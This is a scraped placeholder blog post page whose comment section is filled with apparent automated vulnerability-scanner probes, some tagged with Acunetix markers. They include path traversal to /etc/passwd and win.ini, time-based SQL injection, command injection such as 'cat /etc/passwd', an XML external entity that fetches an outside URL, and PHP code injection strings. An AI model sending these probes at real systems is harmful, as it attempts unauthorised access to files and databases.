testtttt
Web development 19 Dec 2019 Alex Smith
holls test
Leave a Comment
Related Posts
How to install Visual Composer…
Web development
25 Jul 2020
teste
Web development
30 Jul 2020
245yuio
Web development
24 Apr 2020
Categories
- Web development 10
- Techtalk 5
- Photoshoots 1
Comments - (514)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
WEB-INF\web.xml
WEB-INF/web.xml
20
20
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
20
20
20
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
20
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
20
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
20
20
20
..\..\..\..\..\..\..\..\windows\win.ini
20
................windowswin.ini
20
20
20
20
20
20
windowswin.ini
20
../../../../../../../../../../windows/win.ini.jpg
20
../../../../../../../../../../boot.ini
20
20
../../../../../../../../../../windows/win.ini
20
WEB-INF\web.xml
20
20
20
WEB-INF/web.xml
20
20
/\../\../\../\../\../\../\../etc/passwd
20
file:///etc/passwd
20
20
20
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
20
................etc/passwd
20
20
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
20"; waitfor delay '0:0:4' --
20'; waitfor delay '0:0:4' --
20
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
20
20; waitfor delay '0:0:4' --
/etc/passwd
20';select pg_sleep(4); --
20
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20;select pg_sleep(4); --
20
20"=sleep(4)="
20
20'=sleep(4)='
"|dir
/../..//../..//../..//../..//../..//etc/passwd.jpg
20" or (sleep(4)+1) limit 1 --
'|dir
../../../../../../../../../../etc/passwd.jpg
20
|dir
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
20
../../../../../../../../../../etc/passwd.jpg
20
20' or (sleep(4)+1) limit 1 --
../../../../../../../../../../etc/passwd.jpg
20
../../../../../../../../../../etc/passwd
"&dir&"
20" and sleep(4)="
20
20
'&dir&'
20' and (sleep(4)+1) limit 1 --
''""
20
20' and sleep(4)='
&dir
'"
20
20
20 or (sleep(4)+1) limit 1 --
JyI=
20
||cat /etc/passwd
20
20 and sleep(4)
@@1BBG4
20
";cat /etc/passwd;"
20
1xa7
-1" or "93"="0
20
';cat /etc/passwd;'
20
-1" or "93"="93
20
20
;cat /etc/passwd;
\
20
1'"
20
"|"ld
-1' or '95'='0
20
20
20
54/.
-1' or '95'='95
'|'ld
20
54
-1 or 74=0
|cat /etc/passwd#
20
-1 or 74=74
20
20
`cat /etc/passwd`
20;970794
54
20
20
20
20
<!--
20
20
cat /etc/passwd
20
20'"()&%[removed]prompt(901138)[removed]
20
"&cat /etc/passwd&"
'"
20
20
20
20
20
20
20
'&cat /etc/passwd&'
acunetix_wvs_invalid_filename
20
20
&cat /etc/passwd&
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>
20
20
20
20
20
20
20
20
20
20
20
20
20
20
'"\'\");|]*{ <>
20
20
${@print(md5(acunetix_wvs_security_test))}\
20
20
//www.acunetix.tst
1e309
20
20
20
20
${@print(md5(acunetix_wvs_security_test))}
20
20
..
20
20
20
20
20
h
";print(md5(acunetix_wvs_security_test));$a="
20
20
20
20
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
268435455
';print(md5(acunetix_wvs_security_test));$a='
20
20
20
20
http://testasp.vulnweb.com/t/fit.txt
20
20
20
20
;print(md5(acunetix_wvs_security_test));
20
20
20
20
20
20
20
20
20
20
20
20
20
testasp.vulnweb.com
20
20
20
http://testasp.vulnweb.com/t/xss.html?.jpg
20
20
20
20
20
20
http://testasp.vulnweb.com/t/fit.txt?.jpg
20
^(#$!@#$)(()))******
20
20
20
20
1some_inexistent_file_with_long_name.jpg
20
!(()&&!|*|*|
20
'"()
20
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
20
20
20
)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20&n990475=v912571
20
20
20
20
20
20
20
20
20
${100373+99429}
20
SomeCustomInjectedHeader:injected_by_wvs
20
20
SomeCustomInjectedHeader:injected_by_wvs
20
SomeCustomInjectedHeader:injected_by_wvs
20
20
"+response.write(9945611*9601862)+"
20
20
'+response.write(9945611*9601862)+'
20
response.write(9945611*9601862)
20
20
20
20
20
20
-1" or "90"="0
20
-1" or "90"="90
-1' or '82'='0
-1' or '82'='82
20
;cat /etc/passwd;
20
"|"ld
^(#$!@#$)(()))******
-1 or 20=0
20
20
'|'ld
!(()&&!|*|*|
-1 or 20=20
20
|cat /etc/passwd#
)
20
20
20
20
20
20
20
20
20
20
20
`cat /etc/passwd`
20
20
20
20
20
20
20
cat /etc/passwd
20
20
"&cat /etc/passwd&"
20
20
20
20
'&cat /etc/passwd&'
20
20
20
testasp.vulnweb.com
20
20
20
&cat /etc/passwd&
20
20
20
http://testasp.vulnweb.com/t/fit.txt?.jpg
20
20&n907892=v979904
20
20
1some_inexistent_file_with_long_name.jpg
20
'"\'\");|]*{ <>
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
20
20
20
20
20
20
20
20
20
1e309
20
20
20
20
20
..
20
20
20
20
20
h
20
20
20
20
268435455
20
20
${100486+99251}
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
SomeCustomInjectedHeader:injected_by_wvs
20
20
20
20
SomeCustomInjectedHeader:injected_by_wvs
20
20
20
20
SomeCustomInjectedHeader:injected_by_wvs
20
"+response.write(9677865*9122333)+"
20
20
20
'+response.write(9677865*9122333)+'
20
20
20
20
response.write(9677865*9122333)
20
20
20
20
20
20
20
20
20
20
20
20